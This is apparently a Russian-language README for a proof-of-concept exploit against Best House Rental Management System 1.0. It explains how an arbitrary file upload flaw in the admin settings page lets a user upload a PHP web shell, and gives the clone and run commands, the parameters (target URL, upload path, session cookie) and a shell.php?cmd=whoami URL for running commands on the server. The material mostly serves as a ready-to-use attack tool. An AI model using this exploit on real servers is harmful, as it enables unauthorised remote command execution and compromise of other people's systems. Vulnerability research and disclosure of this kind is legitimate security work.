
Этот Python-скрипт демонстрирует, как эксплуатировать уязвимость произвольной загрузки файлов в Best House Rental Management System 1.0. Уязвимость позволяет злоумышленнику загрузить вредоносный файл (например, PHP-веб-шелл) и выполнять произвольные команды на целевом сервере.
Клонируйте репозиторий и перейдите в каталог:
git clone https://github.com/yourusername/house-rental-poc.git
cd house-rental-poc
Запустите эксплойт со следующими параметрами:
bash
python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>
target_url: URL страницы загрузки файлов с уязвимостью (например, http:///rental/admin_class.php?view=save_settings) file_upload_path: путь, по которому хранятся загруженные файлы (например, http:///path/to/uploaded/files) session_cookie: сессионный cookie аутентифицированного пользователя
В случае успеха вы сможете выполнять команды на целевом сервере, перейдя по адресу:
bash
http://<file_upload_path>/shell.php?cmd=whoami
Проверьте его, выполняя команды, например whoami или uname -a.
Пример
python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789
Этот код распространяется под лицензией MIT.